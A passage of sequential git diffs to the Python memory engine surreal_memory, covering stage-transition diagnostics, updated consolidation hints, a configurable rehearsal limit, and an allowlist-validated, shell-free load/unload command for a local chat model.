@@ -1238,6 +1249,10 @@ class ConsolidationEngine:
             advanced = compute_stage_transition(record, now=reference_time)
             if advanced.stage != record.stage:
                 report.stages_advanced += 1
+                hop_key = _hop_keys.get((record.stage, advanced.stage))
+                if hop_key:
+                    transitions = report.extra.setdefault("stage_transitions", {})
+                    transitions[hop_key] = transitions.get(hop_key, 0) + 1
                 if not dry_run:
                     try:
                         await self._storage.save_maturation(advanced)

--- a/src/surreal_memory/engine/diagnostics.py
+++ b/src/surreal_memory/engine/diagnostics.py
@@ -15,7 +15,7 @@ from enum import StrEnum
 from typing import TYPE_CHECKING, Any
 
 from surreal_memory.core.synapse import SynapseType
-from surreal_memory.engine.memory_stages import MemoryStage
+from surreal_memory.engine.memory_stages import MemoryStage, classify_episodic_blocker
 from surreal_memory.utils.tag_normalizer import TagNormalizer
 from surreal_memory.utils.timeutils import utcnow
 
@@ -293,6 +293,14 @@ class BrainHealthReport:
     # raw table total. Kept separate so a dashboard can show both without guessing.
     semantic_synapse_count: int = 0
 
+    # Maturation visibility (run 010 / D2): consolidation_ratio alone cannot
+    # explain itself -- these two answer "what does the stage breakdown look
+    # like" and "of the fibers not yet semantic, which gate is blocking them".
+    # None on backends without maturation support rather than an empty dict,
+    # so a caller can distinguish "no episodic fibers" from "not supported".
+    stage_distribution: dict[str, int] | None = None
+    semantic_gate_blockers: dict[str, int] | None = None
+
 
 # ── Grade mapping ────────────────────────────────────────────────
 
@@ -399,11 +407,39 @@ class DiagnosticsEngine:
         async def _connected_or_none() -> set[str] | None:
             return await get_connected() if get_connected is not None else None
 
-        fibers, consolidation_ratio, activation_efficiency, connected = await asyncio.gather(
+        async def _stage_distribution_or_none() -> dict[str, int] | None:
+            try:
+                return await self._storage.get_fiber_stage_counts(brain_id)
+            except Exception:
+                return None
+
+        async def _semantic_gate_blockers_or_none() -> dict[str, int] | None:
+            try:
+                episodic_records = await self._storage.find_maturations(stage=MemoryStage.EPISODIC)
+            except Exception:
+                return None
+            if not episodic_records:
+                return None
+            now = utcnow()
+            counts = {"time_gate": 0, "spacing_gate": 0, "ready": 0}
+            for record in episodic_records:
+                counts[classify_episodic_blocker(record, now=now)] += 1
+            return counts
+
+        (
+            fibers,
+            consolidation_ratio,
+            activation_efficiency,
+            connected,
+            stage_distribution,
+            semantic_gate_blockers,
+        ) = await asyncio.gather(
             self._storage.get_fibers(limit=10000),
             self._compute_consolidation_ratio(fiber_count),
             self._compute_activation_efficiency(neuron_count),
             _connected_or_none(),
+            _stage_distribution_or_none(),
+            _semantic_gate_blockers_or_none(),
         )
 
         # Score connectivity on the semantic graph only — see _STRUCTURAL_SYNAPSE_TYPES.
@@ -505,6 +541,8 @@ class DiagnosticsEngine:
             contradiction_count=contradicts_count,
             conflict_rate=round(conflict_rate, 4),
             semantic_synapse_count=semantic_synapse_count,
+            stage_distribution=stage_distribution,
+            semantic_gate_blockers=semantic_gate_blockers,
         )
 
     # ── Metric computations ──────────────────────────────────────

--- a/src/surreal_memory/engine/diagnostics.py
+++ b/src/surreal_memory/engine/diagnostics.py
@@ -97,7 +97,9 @@ _COMPONENT_WEIGHTS: dict[str, tuple[float, str]] = {
     ),
     "consolidation_ratio": (
         0.15,
-        "Run: smem consolidate --strategy mature — memories advance through repeated use.",
+        "Recall or store these memories again spread across 3+ different days "
+        "(or reach 15+ rehearsals across 5+ time windows) — memories advance to "
+        "semantic via spaced repetition, not by running consolidate.",
     ),
     "orphan_rate": (
         0.10,
@@ -179,8 +181,10 @@ def _build_dynamic_action(
     elif component == "consolidation_ratio":
         episodic_pct = int((1.0 - consolidation_ratio) * 100)
         return (
-            f"Run `smem consolidate` — {episodic_pct}% of fibers still episodic "
-            "(target: 50%+ semantic). Memories mature through repeated recalls."
+            f"{episodic_pct}% of fibers are still episodic (target: 50%+ semantic). "
+            "They advance to semantic only through spaced recall — reinforcement "
+            "spread across 3+ distinct days (or 15+ rehearsals across 5+ time "
+            "windows). Running `smem consolidate` will not move this on its own."
         )
     elif component == "orphan_rate" and neuron_count > 0:
         orphan_count = int(orphan_rate * neuron_count)
@@ -793,8 +797,9 @@ class DiagnosticsEngine:
             )
             recommendations.append(
                 f"All {fiber_count} memories are still episodic (not consolidated). "
-                "Run: smem consolidate --strategy mature to advance them. "
-                "Memories need repeated recalls over days to mature naturally."
+                "They advance to semantic only through spaced recall — reinforcement "
+                "spread across 3+ distinct days (or 15+ rehearsals across 5+ time "
+                "windows). Running `smem consolidate` will not move this on its own."
             )
 
         # Tag drift detection

--- a/src/surreal_memory/engine/lifecycle.py
+++ b/src/surreal_memory/engine/lifecycle.py
@@ -377,7 +377,7 @@ class ReinforcementManager:
         reinforcement_delta: float = 0.05,
         max_activation: float = 1.0,
         max_weight: float = 1.0,
-        rehearsal_neuron_limit: int = 25,
+        rehearsal_neuron_limit: int = 15,
     ):
         """Initialize reinforcement manager.
 

--- a/src/surreal_memory/engine/lifecycle.py
+++ b/src/surreal_memory/engine/lifecycle.py
@@ -377,6 +377,7 @@ class ReinforcementManager:
         reinforcement_delta: float = 0.05,
         max_activation: float = 1.0,
         max_weight: float = 1.0,
+        rehearsal_neuron_limit: int = 25,
     ):
         """Initialize reinforcement manager.
 
@@ -384,10 +385,13 @@ class ReinforcementManager:
             reinforcement_delta: Amount to increase on each access
             max_activation: Maximum activation level
             max_weight: Maximum synapse weight
+            rehearsal_neuron_limit: How many of the given neuron_ids feed
+                maturation rehearsal (see BrainConfig.reinforcement_neuron_limit)
         """
         self.reinforcement_delta = reinforcement_delta
         self.max_activation = max_activation
         self.max_weight = max_weight
+        self.rehearsal_neuron_limit = rehearsal_neuron_limit
 
     async def reinforce(
         self,
@@ -434,13 +438,18 @@ class ReinforcementManager:
 
         # Rehearse maturation records for fibers connected to reinforced neurons.
         # This is required for EPISODIC → SEMANTIC transition (needs 3+ distinct days).
+        # Every fiber find_fibers_batch surfaces gets rehearsed -- the only cap is
+        # how many neurons feed the lookup (rehearsal_neuron_limit), so coverage
+        # scales with what recall actually activated instead of a fixed count.
         if neuron_ids:
             try:
                 from surreal_memory.engine.memory_stages import MaturationRecord, MemoryStage
 
-                fibers = await storage.find_fibers_batch(neuron_ids[:10], limit_per_neuron=3)
+                fibers = await storage.find_fibers_batch(
+                    neuron_ids[: self.rehearsal_neuron_limit], limit_per_neuron=3
+                )
                 seen_fiber_ids: set[str] = set()
-                for fiber in fibers[:10]:
+                for fiber in fibers:
                     if fiber.id in seen_fiber_ids:
                         continue
                     seen_fiber_ids.add(fiber.id)

--- a/src/surreal_memory/engine/memory_stages.py
+++ b/src/surreal_memory/engine/memory_stages.py
@@ -245,3 +245,36 @@ def get_decay_multiplier(stage: MemoryStage) -> float:
         Decay multiplier (higher = faster decay)
     """
     return STAGE_DECAY_MULTIPLIERS.get(stage, 1.0)
+
+
+def classify_episodic_blocker(record: MaturationRecord, now: datetime | None = None) -> str:
+    """Classify why an EPISODIC record hasn't reached SEMANTIC yet.
+
+    Single source of truth for "what's blocking the semantic gate" so callers
+    (health diagnostics, brain evolution) never duplicate -- and drift out of
+    sync with -- the actual promotion rule in compute_stage_transition,
+    including the less obvious rehearsal-count/windows alternative path.
+
+    Args:
+        record: A maturation record. Caller must ensure ``record.stage ==
+            MemoryStage.EPISODIC``; this function only makes sense for that
+            stage and does not check it.
+        now: Reference time (default: utcnow)
+
+    Returns:
+        "ready" if both gates are already satisfied (will advance on the next
+        stage-transition pass), "spacing_gate" if reinforcement is not spread
+        widely enough yet, or "time_gate" if it simply hasn't dwelt in
+        EPISODIC long enough (spacing already satisfied).
+    """
+    now = now or utcnow()
+    time_met = (now - record.stage_entered_at) >= _EPISODIC_TO_SEMANTIC
+    spacing_met = record.distinct_reinforcement_days >= _MIN_DISTINCT_DAYS or (
+        record.rehearsal_count >= _MIN_REHEARSAL_COUNT
+        and record.distinct_reinforcement_windows >= _MIN_DISTINCT_WINDOWS
+    )
+    if time_met and spacing_met:
+        return "ready"
+    if not spacing_met:
+        return "spacing_gate"
+    return "time_gate"

--- a/src/surreal_memory/engine/reasoning_distiller.py
+++ b/src/surreal_memory/engine/reasoning_distiller.py
@@ -578,9 +578,13 @@ async def distill_reasoning_patterns(
     embedder = embedder or _get_embedder()
     seeds = await _seed_centroids(embedder, rt.categories) if embedder is not None else None
     # None unless distill_use_llm is on AND a local endpoint and model are set.
-    # The chat model is pulled in by the first rename and released in the finally
-    # below, so it is resident for this run only.
+    # acquire() explicitly loads the chat model when distill_llm_load_cmd is
+    # configured (a no-op otherwise, falling back to the first rename pulling
+    # it in implicitly as before); released in the finally below either way,
+    # so it is resident for this run only.
     namer = build_namer(rt)
+    if namer is not None:
+        await namer.acquire()
 
     existing = await storage.find_fibers(
         metadata_key="_reasoning_pattern", limit=_PATTERN_FETCH_LIMIT

--- a/src/surreal_memory/engine/reasoning_naming.py
+++ b/src/surreal_memory/engine/reasoning_naming.py
@@ -422,6 +422,14 @@ class PatternNamer:
             part.replace(_MODEL_PLACEHOLDER, self._model) if _MODEL_PLACEHOLDER in part else part
             for part in self._load_cmd
         ]
+        # Flagged before the attempt, mirroring rename(): a command that times
+        # out or otherwise raises (e.g. _run_command_subprocess killing a slow
+        # process at _LOAD_TIMEOUT_SECONDS) may still have started pulling the
+        # model into memory, so release() must still attempt cleanup rather
+        # than leaving it stranded -- its own unload failure is already a
+        # harmless warning. Setting this only on the success path would leave
+        # exactly the VRAM-leak scenario this method exists to close.
+        self._model_in_use = True
         try:
             code = await self._run(argv, _LOAD_TIMEOUT_SECONDS)
         except Exception as exc:  # a load command must never block distillation
@@ -433,10 +441,6 @@ class PatternNamer:
                 exc,
             )
             return
-        # Even a nonzero exit may have started pulling the model into memory,
-        # so release() must still attempt cleanup rather than leaving it
-        # stranded -- its own unload failure is already a harmless warning.
-        self._model_in_use = True
         if code == 0:
             logger.info("reasoning naming: explicitly loaded %s before distillation", self._model)
         else:

--- a/src/surreal_memory/engine/reasoning_naming.py
+++ b/src/surreal_memory/engine/reasoning_naming.py
@@ -94,6 +94,9 @@ _NO_THINKING_KWARGS = {"enable_thinking": False}
 _FAILURE_LIMIT = 3
 # Unloading is a local process teardown; it should be near-instant.
 _UNLOAD_TIMEOUT_SECONDS = 30.0
+# Loading spawns a server process and waits for a multi-GB model to reach disk
+# or mmap and bind its port -- much slower than teardown, so a longer budget.
+_LOAD_TIMEOUT_SECONDS = 120.0
 # Substituted into distill_llm_unload_cmd so one command template can name the
 # model it is releasing.
 _MODEL_PLACEHOLDER = "{model}"
@@ -324,12 +327,14 @@ class PatternNamer:
         post_json: PostJson,
         *,
         unload_cmd: tuple[str, ...] = (),
+        load_cmd: tuple[str, ...] = (),
         run_command: RunCommand | None = None,
     ) -> None:
         self._url = f"{endpoint}/chat/completions"
         self._model = model
         self._post = post_json
         self._unload_cmd = unload_cmd
+        self._load_cmd = load_cmd
         self._run = run_command or _run_command_subprocess
         self._consecutive_failures = 0
         self._given_up = False
@@ -340,6 +345,9 @@ class PatternNamer:
         # the model to be loaded. Reset by release() so a namer reused after a
         # release acquires and releases again rather than releasing twice.
         self._model_in_use = False
+        # acquire() runs once per run (idempotency guard, mirroring release()'s
+        # own safe-to-call-more-than-once contract).
+        self._load_attempted = False
 
     def _record_failure(self, reason: str, exc: BaseException | None = None) -> None:
         self._consecutive_failures += 1
@@ -394,6 +402,50 @@ class PatternNamer:
 
         self._consecutive_failures = 0
         return {**pattern, **fields}
+
+    async def acquire(self) -> None:
+        """Explicitly load the chat model before the first request, once per run.
+
+        A no-op when no load command is configured -- distillation must work
+        without one, falling back to the endpoint's implicit
+        load-on-first-request behavior (rename() already flags
+        _model_in_use once an actual request goes out). Any failure here is
+        silent and non-fatal: this is an optimization (get the model on GPU
+        with the right parameters before the first request), never a
+        precondition for distillation to proceed. Safe to call more than once.
+        """
+        if not self._load_cmd or self._load_attempted:
+            return
+        self._load_attempted = True
+
+        argv = [
+            part.replace(_MODEL_PLACEHOLDER, self._model) if _MODEL_PLACEHOLDER in part else part
+            for part in self._load_cmd
+        ]
+        try:
+            code = await self._run(argv, _LOAD_TIMEOUT_SECONDS)
+        except Exception as exc:  # a load command must never block distillation
+            logger.debug(
+                "reasoning naming: load command for %s failed (%s: %s); falling back"
+                " to implicit load-on-first-request",
+                self._model,
+                type(exc).__name__,
+                exc,
+            )
+            return
+        # Even a nonzero exit may have started pulling the model into memory,
+        # so release() must still attempt cleanup rather than leaving it
+        # stranded -- its own unload failure is already a harmless warning.
+        self._model_in_use = True
+        if code == 0:
+            logger.info("reasoning naming: explicitly loaded %s before distillation", self._model)
+        else:
+            logger.warning(
+                "reasoning naming: load command for %s exited %s; continuing anyway"
+                " (implicit load-on-first-request still applies)",
+                self._model,
+                code,
+            )
 
     async def release(self) -> None:
         """Unload the chat model this run pulled in. Safe to call more than once.
@@ -469,5 +521,6 @@ def build_namer(
         model,
         post_json or _post_json_httpx,
         unload_cmd=tuple(rt.distill_llm_unload_cmd),
+        load_cmd=tuple(rt.distill_llm_load_cmd),
         run_command=run_command,
     )

--- a/src/surreal_memory/engine/reasoning_naming.py
+++ b/src/surreal_memory/engine/reasoning_naming.py
@@ -60,6 +60,8 @@ import re
 from typing import TYPE_CHECKING, Any, Protocol
 from urllib.parse import urlsplit
 
+from surreal_memory.unified_config import _TOML_SAFE_ARGV
+
 if TYPE_CHECKING:
     from surreal_memory.unified_config import ReasoningTrainingConfig
 
@@ -102,6 +104,29 @@ _LOAD_TIMEOUT_SECONDS = 120.0
 _MODEL_PLACEHOLDER = "{model}"
 
 _JSON_FENCE_RE = re.compile(r"```(?:json)?\s*(.*?)```", re.DOTALL)
+
+
+def _substitute_model_and_validate(cmd: tuple[str, ...], model: str) -> list[str] | None:
+    """Fill in ``{model}`` and re-check the result against ``_TOML_SAFE_ARGV``.
+
+    Each part of ``cmd`` already passed that same allowlist at config-load
+    time (inline in ``ReasoningTrainingConfig.from_dict``), but ``model``
+    comes from ``distill_llm_model``, which is sanitized with
+    ``_sanitize_toml_glob`` -- a looser charset (spaces, ``*?[]``) since it is
+    not itself an argv element, only the template it gets substituted into
+    is. Re-validating post-substitution closes that gap: a model name
+    containing a character the argv allowlist would reject must void the
+    command, the same as an invalid literal part does, rather than silently
+    reaching ``create_subprocess_exec``.
+    """
+    argv = [
+        part.replace(_MODEL_PLACEHOLDER, model) if _MODEL_PLACEHOLDER in part else part
+        for part in cmd
+    ]
+    if not all(_TOML_SAFE_ARGV.match(part) for part in argv):
+        return None
+    return argv
+
 
 _SYSTEM_PROMPT = (
     "You name reusable reasoning strategies. You are given several excerpts of a"
@@ -300,7 +325,7 @@ async def _post_json_httpx(url: str, payload: dict[str, Any], timeout: float) ->
 
 
 async def _run_command_subprocess(argv: list[str], timeout: float) -> int:
-    """Default unload runner: exec the argv directly, with no shell involved."""
+    """Shared load/unload runner: exec the argv directly, with no shell involved."""
     process = await asyncio.create_subprocess_exec(
         *argv,
         stdout=asyncio.subprocess.PIPE,
@@ -313,7 +338,12 @@ async def _run_command_subprocess(argv: list[str], timeout: float) -> int:
         await process.wait()
         raise
     if stdout:
-        logger.debug("reasoning naming: unload output: %s", stdout.decode(errors="replace").strip())
+        # Shared by acquire() and release() -- "command", not "unload", since
+        # this same runner now services both and the output isn't otherwise
+        # tagged with which one triggered it.
+        logger.debug(
+            "reasoning naming: command output: %s", stdout.decode(errors="replace").strip()
+        )
     return process.returncode if process.returncode is not None else -1
 
 
@@ -418,10 +448,14 @@ class PatternNamer:
             return
         self._load_attempted = True
 
-        argv = [
-            part.replace(_MODEL_PLACEHOLDER, self._model) if _MODEL_PLACEHOLDER in part else part
-            for part in self._load_cmd
-        ]
+        argv = _substitute_model_and_validate(self._load_cmd, self._model)
+        if argv is None:
+            logger.warning(
+                "reasoning naming: distill_llm_model %r contains a character the load"
+                " command's argv allowlist rejects; skipping the explicit load",
+                self._model,
+            )
+            return
         # Flagged before the attempt, mirroring rename(): a command that times
         # out or otherwise raises (e.g. _run_command_subprocess killing a slow
         # process at _LOAD_TIMEOUT_SECONDS) may still have started pulling the
@@ -462,10 +496,14 @@ class PatternNamer:
             return
         self._model_in_use = False
 
-        argv = [
-            part.replace(_MODEL_PLACEHOLDER, self._model) if _MODEL_PLACEHOLDER in part else part
-            for part in self._unload_cmd
-        ]
+        argv = _substitute_model_and_validate(self._unload_cmd, self._model)
+        if argv is None:
+            logger.warning(
+                "reasoning naming: distill_llm_model %r contains a character the unload"
+                " command's argv allowlist rejects; skipping the explicit unload",
+                self._model,
+            )
+            return
         try:
             code = await self._run(argv, _UNLOAD_TIMEOUT_SECONDS)
         except Exception as exc:  # a stuck model must not fail a run

--- a/src/surreal_memory/engine/retrieval.py
+++ b/src/surreal_memory/engine/retrieval.py
@@ -174,6 +174,7 @@ class ReflexPipeline:
 
         self._reinforcer = ReinforcementManager(
             reinforcement_delta=config.reinforcement_delta,
+            rehearsal_neuron_limit=config.reinforcement_neuron_limit,
         )
         self._write_queue = DeferredWriteQueue()
         self._query_router = QueryRouter()
@@ -654,7 +655,7 @@ class ReflexPipeline:
                 top_neuron_ids = [
                     nid
                     for nid, _ in heapq.nlargest(
-                        10,
+                        self._config.reinforcement_neuron_limit,
                         activations.items(),
                         key=lambda x: x[1].activation_level,
                     )

--- a/src/surreal_memory/engine/spaced_repetition.py
+++ b/src/surreal_memory/engine/spaced_repetition.py
@@ -30,6 +30,7 @@ class SpacedRepetitionEngine:
         self._config = config
         self._reinforcer = ReinforcementManager(
             reinforcement_delta=config.reinforcement_delta,
+            rehearsal_neuron_limit=config.reinforcement_neuron_limit,
         )
 
     async def get_review_queue(self, limit: int = 20) -> list[dict[str, Any]]:

--- a/src/surreal_memory/mcp/evolution_handler.py
+++ b/src/surreal_memory/mcp/evolution_handler.py
@@ -73,6 +73,9 @@ class EvolutionHandler:
                 "total": evo.stage_distribution.total,
             }
 
+        if evo.semantic_gate_blockers is not None:
+            result["semantic_gate_blockers"] = dict(evo.semantic_gate_blockers)
+
         if evo.closest_to_semantic:
             result["closest_to_semantic"] = [
                 {

--- a/src/surreal_memory/mcp/prompt.py
+++ b/src/surreal_memory/mcp/prompt.py
@@ -274,7 +274,8 @@ pip install surreal-memory[extract]   # PDF, DOCX, PPTX, HTML, XLSX support
 Consolidation 15%, Orphan Rate 10%, Activation 10%, Recall Confidence 5%.
 
 **Common fixes:**
-- Consolidation 0% → Run `smem consolidate --strategy mature` (normal for new brains)
+- Consolidation 0% → normal for new brains; it rises only via spaced recall — reinforcement
+  spread across 3+ distinct days (or 15+ rehearsals across 5+ time windows), not `smem consolidate`
 - Orphan rate > 20% → Run `smem consolidate --strategy prune`
 - Activation < 10% → Recall stored topics: `smem_recall('topic')` for 5+ topics
 - Low connectivity → Store memories with context: "X because Y", "after A then B"

--- a/src/surreal_memory/mcp/stats_handler.py
+++ b/src/surreal_memory/mcp/stats_handler.py
@@ -160,15 +160,16 @@ class StatsHandler:
 
             if fiber_count >= 50 and consolidation_pct == 0:
                 hints.append(
-                    f"You have {fiber_count} memories but 0% consolidated. "
-                    "Run: smem_auto action='process' or smem consolidate --strategy mature "
-                    "to advance memories from episodic to semantic stage."
+                    f"You have {fiber_count} memories but 0% consolidated. Memories advance "
+                    "to semantic only through spaced recall — reinforcement spread across "
+                    "3+ distinct days (or 15+ rehearsals across 5+ time windows). Running "
+                    "consolidate will not move this on its own."
                 )
             elif fiber_count >= 100 and consolidation_pct < 10:
                 hints.append(
                     f"{fiber_count} memories, only {consolidation_pct:.0f}% consolidated. "
-                    "Recall topics you've stored to help memories mature, "
-                    "then run consolidation."
+                    "Recall topics you've stored on 3+ different days to help memories "
+                    "mature — consolidation alone will not advance them."
                 )
         except Exception:
             logger.debug("Maturation check failed (non-critical)", exc_info=True)

--- a/src/surreal_memory/storage/surrealdb/store.py
+++ b/src/surreal_memory/storage/surrealdb/store.py
@@ -1990,6 +1990,12 @@ class SurrealDBStorage(
         await self._query("DELETE neuron_state WHERE brain_id = $bid", bid=brain_id)
         await self._query("DELETE synapse WHERE brain_id = $bid", bid=brain_id)
         await self._query("DELETE fiber WHERE brain_id = $bid", bid=brain_id)
+        # Maturation rows outlive their fiber (delete_fiber has no cascade, by
+        # design -- see engine/consolidation.py's merge path), so a brain wipe
+        # must clear them explicitly or they orphan permanently once the
+        # brain record itself is gone (found live: run 010's own benchmark
+        # left rows behind before this line existed).
+        await self._query("DELETE maturation WHERE brain_id = $bid", bid=brain_id)
         await self._query("DELETE change_log WHERE brain_id = $bid", bid=brain_id)
         await self._query("DELETE device WHERE brain_id = $bid", bid=brain_id)
         await self._query("DELETE merkle_hash WHERE brain_id = $bid", bid=brain_id)

--- a/src/surreal_memory/unified_config.py
+++ b/src/surreal_memory/unified_config.py
@@ -1106,12 +1106,13 @@ class ToolMemoryConfig:
 # while still blocking quotes/backslashes/control chars (TOML-injection safe).
 _TOML_SAFE_GLOB = re.compile(r"^[a-zA-Z0-9_\-\./ *?\[\]]*$")
 
-# One argv part of reasoning_training.distill_llm_unload_cmd. Deliberately
-# narrower than a glob: no quotes, no shell metacharacters, no newlines. Braces
-# are allowed solely for the "{model}" placeholder. The command is executed
-# without a shell, so this is defence in depth rather than the only guard.
+# One argv part of reasoning_training.distill_llm_unload_cmd /
+# distill_llm_load_cmd. Deliberately narrower than a glob: no quotes, no shell
+# metacharacters, no newlines. Braces are allowed solely for the "{model}"
+# placeholder. The command is executed without a shell, so this is defence in
+# depth rather than the only guard.
 _TOML_SAFE_ARGV = re.compile(r"^[a-zA-Z0-9_\-\./:={}]+$")
-_UNLOAD_CMD_MAX_PARTS = 16
+_CMD_MAX_PARTS = 16
 
 
 def _sanitize_toml_glob(value: str) -> str:
@@ -1179,6 +1180,13 @@ class ReasoningTrainingConfig:
     # model again, so it does not stay resident between runs. "{model}" is
     # replaced with distill_llm_model. Empty = leave the model loaded.
     distill_llm_unload_cmd: tuple[str, ...] = ()
+    # argv (NOT a shell string) run once before the first distillation request,
+    # so a model needing specific launch parameters (e.g. GPU-only, no
+    # multimodal projector) does not depend on whatever an external
+    # auto-starter happens to remember. Same "{model}" substitution as
+    # distill_llm_unload_cmd. Empty = keep relying on implicit
+    # load-on-first-request.
+    distill_llm_load_cmd: tuple[str, ...] = ()
     redact_secrets: bool = True
     # Per-model distillation targets: model name -> desired pattern count (0-100).
     # An unlisted model defaults to 0 → distillation is skipped for it (the
@@ -1207,6 +1215,7 @@ class ReasoningTrainingConfig:
             "distill_llm_model": self.distill_llm_model,
             "distill_llm_endpoint": self.distill_llm_endpoint,
             "distill_llm_unload_cmd": list(self.distill_llm_unload_cmd),
+            "distill_llm_load_cmd": list(self.distill_llm_load_cmd),
             "redact_secrets": self.redact_secrets,
             "pattern_targets": dict(self.pattern_targets),
         }
@@ -1272,9 +1281,17 @@ class ReasoningTrainingConfig:
         unload_raw = data.get("distill_llm_unload_cmd", [])
         unload_cmd: tuple[str, ...] = ()
         if isinstance(unload_raw, (list, tuple)) and unload_raw:
-            parts = [str(p).strip() for p in unload_raw[:_UNLOAD_CMD_MAX_PARTS]]
+            parts = [str(p).strip() for p in unload_raw[:_CMD_MAX_PARTS]]
             if all(p and _TOML_SAFE_ARGV.match(p) for p in parts):
                 unload_cmd = tuple(p[:_TOML_STR_MAX_LEN] for p in parts)
+
+        # Load command: same argv-only rule as the unload command above.
+        load_raw = data.get("distill_llm_load_cmd", [])
+        load_cmd: tuple[str, ...] = ()
+        if isinstance(load_raw, (list, tuple)) and load_raw:
+            parts = [str(p).strip() for p in load_raw[:_CMD_MAX_PARTS]]
+            if all(p and _TOML_SAFE_ARGV.match(p) for p in parts):
+                load_cmd = tuple(p[:_TOML_STR_MAX_LEN] for p in parts)
 
         return cls(
             mining_enabled=bool(data.get("mining_enabled", False)),
@@ -1298,6 +1315,7 @@ class ReasoningTrainingConfig:
                 str(data.get("distill_llm_endpoint", "") or "")
             ),
             distill_llm_unload_cmd=unload_cmd,
+            distill_llm_load_cmd=load_cmd,
             redact_secrets=bool(data.get("redact_secrets", True)),
             pattern_targets=pattern_targets,
         )
@@ -1881,6 +1899,9 @@ class UnifiedConfig:
             f'distill_llm_endpoint = "{_sanitize_toml_url(rt.distill_llm_endpoint)}"',
             "distill_llm_unload_cmd = ["
             + ", ".join(f'"{p}"' for p in rt.distill_llm_unload_cmd if _TOML_SAFE_ARGV.match(p))
+            + "]",
+            "distill_llm_load_cmd = ["
+            + ", ".join(f'"{p}"' for p in rt.distill_llm_load_cmd if _TOML_SAFE_ARGV.match(p))
             + "]",
             f"redact_secrets = {'true' if rt.redact_secrets else 'false'}",
             "[reasoning_training.injection_map]",

--- a/src/surreal_memory/unified_config.py
+++ b/src/surreal_memory/unified_config.py
@@ -307,8 +307,9 @@ class BrainSettings:
     decay_rate: float = 0.1
     reinforcement_delta: float = 0.05
     # See core.brain.BrainConfig.reinforcement_neuron_limit for why this exists
-    # and why 25 (raised from a hardcoded, unconfigurable 10).
-    reinforcement_neuron_limit: int = 25
+    # and why 15, not a larger jump (raised from a hardcoded, unconfigurable
+    # 10; measured against a live SurrealDB, not just SQLite).
+    reinforcement_neuron_limit: int = 15
     activation_threshold: float = 0.2
     max_spread_hops: int = 4
     max_context_tokens: int = 1500
@@ -345,7 +346,7 @@ class BrainSettings:
         return cls(
             decay_rate=data.get("decay_rate", 0.1),
             reinforcement_delta=data.get("reinforcement_delta", 0.05),
-            reinforcement_neuron_limit=data.get("reinforcement_neuron_limit", 25),
+            reinforcement_neuron_limit=data.get("reinforcement_neuron_limit", 15),
             activation_threshold=data.get("activation_threshold", 0.2),
             max_spread_hops=data.get("max_spread_hops", 4),
             max_context_tokens=data.get("max_context_tokens", 1500),

--- a/src/surreal_memory/unified_config.py
+++ b/src/surreal_memory/unified_config.py
@@ -306,6 +306,9 @@ class BrainSettings:
 
     decay_rate: float = 0.1
     reinforcement_delta: float = 0.05
+    # See core.brain.BrainConfig.reinforcement_neuron_limit for why this exists
+    # and why 25 (raised from a hardcoded, unconfigurable 10).
+    reinforcement_neuron_limit: int = 25
     activation_threshold: float = 0.2
     max_spread_hops: int = 4
     max_context_tokens: int = 1500
@@ -316,6 +319,7 @@ class BrainSettings:
         {
             "decay_rate",
             "reinforcement_delta",
+            "reinforcement_neuron_limit",
             "activation_threshold",
             "max_spread_hops",
             "max_context_tokens",
@@ -327,6 +331,7 @@ class BrainSettings:
         return {
             "decay_rate": self.decay_rate,
             "reinforcement_delta": self.reinforcement_delta,
+            "reinforcement_neuron_limit": self.reinforcement_neuron_limit,
             "activation_threshold": self.activation_threshold,
             "max_spread_hops": self.max_spread_hops,
             "max_context_tokens": self.max_context_tokens,
@@ -340,6 +345,7 @@ class BrainSettings:
         return cls(
             decay_rate=data.get("decay_rate", 0.1),
             reinforcement_delta=data.get("reinforcement_delta", 0.05),
+            reinforcement_neuron_limit=data.get("reinforcement_neuron_limit", 25),
             activation_threshold=data.get("activation_threshold", 0.2),
             max_spread_hops=data.get("max_spread_hops", 4),
             max_context_tokens=data.get("max_context_tokens", 1500),
@@ -365,6 +371,7 @@ class BrainSettings:
         kwargs: dict[str, Any] = {
             "decay_rate": self.decay_rate,
             "reinforcement_delta": self.reinforcement_delta,
+            "reinforcement_neuron_limit": self.reinforcement_neuron_limit,
             "activation_threshold": self.activation_threshold,
             "max_spread_hops": self.max_spread_hops,
             "max_context_tokens": self.max_context_tokens,
@@ -1915,6 +1922,7 @@ class UnifiedConfig:
             "[brain]",
             f"decay_rate = {self.brain.decay_rate}",
             f"reinforcement_delta = {self.brain.reinforcement_delta}",
+            f"reinforcement_neuron_limit = {self.brain.reinforcement_neuron_limit}",
             f"activation_threshold = {self.brain.activation_threshold}",
             f"max_spread_hops = {self.brain.max_spread_hops}",
             f"max_context_tokens = {self.brain.max_context_tokens}",

--- a/src/surreal_memory/unified_config.py
+++ b/src/surreal_memory/unified_config.py
@@ -1278,21 +1278,41 @@ class ReasoningTrainingConfig:
 
         # Unload command: argv, never a shell string. A part that is not plain
         # command syntax voids the whole command rather than being silently
-        # dropped — a half-parsed teardown command is worse than none.
+        # dropped — a half-parsed teardown command is worse than none. Same
+        # rule for length: a command longer than _CMD_MAX_PARTS is voided
+        # outright rather than silently truncated to its first N parts, which
+        # would otherwise run a shorter, functionally different command with
+        # no signal that anything was dropped.
         unload_raw = data.get("distill_llm_unload_cmd", [])
         unload_cmd: tuple[str, ...] = ()
         if isinstance(unload_raw, (list, tuple)) and unload_raw:
-            parts = [str(p).strip() for p in unload_raw[:_CMD_MAX_PARTS]]
-            if all(p and _TOML_SAFE_ARGV.match(p) for p in parts):
-                unload_cmd = tuple(p[:_TOML_STR_MAX_LEN] for p in parts)
+            if len(unload_raw) > _CMD_MAX_PARTS:
+                logger.warning(
+                    "distill_llm_unload_cmd has %d parts, exceeding the %d-part limit;"
+                    " ignoring it entirely rather than running a truncated command",
+                    len(unload_raw),
+                    _CMD_MAX_PARTS,
+                )
+            else:
+                parts = [str(p).strip() for p in unload_raw]
+                if all(p and _TOML_SAFE_ARGV.match(p) for p in parts):
+                    unload_cmd = tuple(p[:_TOML_STR_MAX_LEN] for p in parts)
 
-        # Load command: same argv-only rule as the unload command above.
+        # Load command: same argv-only and length rules as unload_cmd above.
         load_raw = data.get("distill_llm_load_cmd", [])
         load_cmd: tuple[str, ...] = ()
         if isinstance(load_raw, (list, tuple)) and load_raw:
-            parts = [str(p).strip() for p in load_raw[:_CMD_MAX_PARTS]]
-            if all(p and _TOML_SAFE_ARGV.match(p) for p in parts):
-                load_cmd = tuple(p[:_TOML_STR_MAX_LEN] for p in parts)
+            if len(load_raw) > _CMD_MAX_PARTS:
+                logger.warning(
+                    "distill_llm_load_cmd has %d parts, exceeding the %d-part limit;"
+                    " ignoring it entirely rather than running a truncated command",
